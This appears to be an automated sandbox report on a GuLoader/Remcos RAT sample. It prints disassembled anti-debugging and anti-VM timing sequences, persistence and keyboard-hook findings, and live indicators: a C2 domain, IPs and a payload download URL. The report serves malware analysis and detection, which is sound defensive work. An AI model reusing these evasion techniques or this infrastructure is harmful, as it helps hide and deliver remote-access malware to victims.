Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F57DB5 second address: 0000000004F57DB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A7105D73h 0x00000007 xor eax, 87E90EABh 0x0000000c xor eax, 91654CB2h 0x00000011 xor eax, B19C1F6Bh 0x00000016 cpuid 0x00000018 test ecx, eax 0x0000001a popad 0x0000001b call 00007F904096867Bh 0x00000020 lfence 0x00000023 mov edx, 2543AA54h 0x00000028 xor edx, 8D843AA0h 0x0000002e xor edx, CC85E3A5h 0x00000034 xor edx, 1BBC7345h 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f test bx, bx 0x00000042 cmp ch, dh 0x00000044 ret 0x00000045 sub edx, esi 0x00000047 ret 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000057 jne 00007F904096865Ch 0x00000059 call 00007F90409686BCh 0x0000005e call 00007F904096869Eh 0x00000063 lfence 0x00000066 mov edx, 2543AA54h 0x0000006b xor edx, 8D843AA0h 0x00000071 xor edx, CC85E3A5h 0x00000077 xor edx, 1BBC7345h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 test bx, bx 0x00000085 cmp ch, dh 0x00000087 ret 0x00000088 mov esi, edx 0x0000008a pushad 0x0000008b rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F57E05 second address: 0000000004F57C28 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, EA4F4DDBh 0x00000013 add eax, E5347E98h 0x00000018 xor eax, 6744AC76h 0x0000001d add eax, 57389FFCh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F9040DEBC91h 0x0000002e cmp ch, ch 0x00000030 pushad 0x00000031 mov eax, 00000094h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F57C28 second address: 0000000004F57E05 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 popad 0x00000004 call 00007F9040968846h 0x00000009 lfence 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F54701 second address: 0000000004F54701 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000000567DB5 second address: 0000000000567DB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A7105D73h 0x00000007 xor eax, 87E90EABh 0x0000000c xor eax, 91654CB2h 0x00000011 xor eax, B19C1F6Bh 0x00000016 cpuid 0x00000018 test ecx, eax 0x0000001a popad 0x0000001b call 00007F904096867Bh 0x00000020 lfence 0x00000023 mov edx, 2543AA54h 0x00000028 xor edx, 8D843AA0h 0x0000002e xor edx, CC85E3A5h 0x00000034 xor edx, 1BBC7345h 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f test bx, bx 0x00000042 cmp ch, dh 0x00000044 ret 0x00000045 sub edx, esi 0x00000047 ret 0x00000048 add edi, edx 0x0000004a dec dword ptr [ebp+000000F8h] 0x00000050 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000057 jne 00007F904096865Ch 0x00000059 call 00007F90409686BCh 0x0000005e call 00007F904096869Eh 0x00000063 lfence 0x00000066 mov edx, 2543AA54h 0x0000006b xor edx, 8D843AA0h 0x00000071 xor edx, CC85E3A5h 0x00000077 xor edx, 1BBC7345h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 test bx, bx 0x00000085 cmp ch, dh 0x00000087 ret 0x00000088 mov esi, edx 0x0000008a pushad 0x0000008b rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000000567E05 second address: 0000000000567C28 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, EA4F4DDBh 0x00000013 add eax, E5347E98h 0x00000018 xor eax, 6744AC76h 0x0000001d add eax, 57389FFCh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F9040DEBC91h 0x0000002e cmp ch, ch 0x00000030 pushad 0x00000031 mov eax, 00000094h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000000567C28 second address: 0000000000567E05 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 popad 0x00000004 call 00007F9040968846h 0x00000009 lfence 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 000000000056160D second address: 000000000056160D instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000000565E34 second address: 0000000000565E34 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 00000000005638CF second address: 00000000005638CF instructions:
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F50C76 rdtsc 0_2_04F50C76
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\FANEBREREN.exe\DYKKERDRAGTSSoftware\Microsoft\Windows\CurrentVersion\RunOnceAMPHITHYRONS
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Fec9qUX4at.exe System information queried: ModuleInformation Jump to behavior

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F50C76 rdtsc 0_2_04F50C76
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F55BFE LdrInitializeThunk, 0_2_04F55BFE
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5546D mov eax, dword ptr fs:[00000030h] 0_2_04F5546D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5864F mov eax, dword ptr fs:[00000030h] 0_2_04F5864F
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5380C mov eax, dword ptr fs:[00000030h] 0_2_04F5380C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F585F7 mov eax, dword ptr fs:[00000030h] 0_2_04F585F7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F579C6 mov eax, dword ptr fs:[00000030h] 0_2_04F579C6
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F573B7 mov eax, dword ptr fs:[00000030h] 0_2_04F573B7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F52D7C mov eax, dword ptr fs:[00000030h] 0_2_04F52D7C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F58355 mov eax, dword ptr fs:[00000030h] 0_2_04F58355

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe' Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' Jump to behavior
Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp, logs.dat.17.dr Binary or memory string: [ Program Manager ]
Source: Fec9qUX4at.exe, 00000011.00000002.487647862.00000000009D7000.00000004.00000020.sdmp Binary or memory string: Program Managerq
Source: Fec9qUX4at.exe, 00000011.00000002.487661352.00000000009E8000.00000004.00000020.sdmp Binary or memory string: |Program Manager|
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected Remcos RAT
Source: Yara match File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Remcos RAT
Source: Yara match File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 458355 Sample: Fec9qUX4at.exe Startdate: 03/08/2021 Architecture: WINDOWS Score: 100 28 Found malware configuration 2->28 30 Multi AV Scanner detection for dropped file 2->30 32 Multi AV Scanner detection for submitted file 2->32 34 10 other signatures 2->34 7 Fec9qUX4at.exe 1 2 2->7         started        process3 signatures4 36 Creates autostart registry keys with suspicious values (likely registry only malware) 7->36 38 Contains functionality to detect hardware virtualization (CPUID execution measurement) 7->38 40 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 7->40 42 3 other signatures 7->42 10 Fec9qUX4at.exe 5 13 7->10         started        process5 dnsIp6 24 101.99.94.119, 49732, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 10->24 26 wealthyrem.ddns.net 194.5.97.128, 39200, 49733 DANILENKODE Netherlands 10->26 18 C:\Users\user\AppData\...\FANEBREREN.exe, PE32 10->18 dropped 20 C:\Users\user\...\wqhhwuvojbjzckdf.vbs, data 10->20 dropped 22 C:\Users\user\AppData\...\FANEBREREN.vbs, ASCII 10->22 dropped 44 Tries to detect Any.run 10->44 46 Hides threads from debuggers 10->46 48 Installs a global keyboard hook 10->48 15 wscript.exe 10->15         started        file7 signatures8 process9 signatures10 50 Deletes itself after installation 15->50
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
194.5.97.128
 wealthyrem.ddns.net Netherlands
208476 DANILENKODE true
101.99.94.119
 unknown Malaysia
45839 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY true

Contacted Domains

Name IP Active
wealthyrem.ddns.net 194.5.97.128 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://101.99.94.119/WEALTH_fkWglQyCXO188.bin true
  • Avira URL Cloud: safe
 unknown